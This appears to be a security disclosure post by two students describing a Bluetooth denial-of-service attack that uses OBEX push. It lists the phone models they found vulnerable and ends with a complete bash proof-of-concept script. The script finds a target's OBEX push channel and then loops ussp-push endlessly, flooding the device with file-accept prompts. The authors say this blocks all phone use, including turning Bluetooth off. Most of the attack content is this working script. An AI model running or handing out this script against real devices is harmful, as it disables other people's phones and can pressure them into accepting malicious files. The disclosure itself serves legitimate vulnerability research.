Bluetooth DoS by obex push

during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.

Using ussp-push, it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.

We confirmed the attack to work on the following phones:

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).

A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung



#!/bin/bash

checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}

if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi

while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done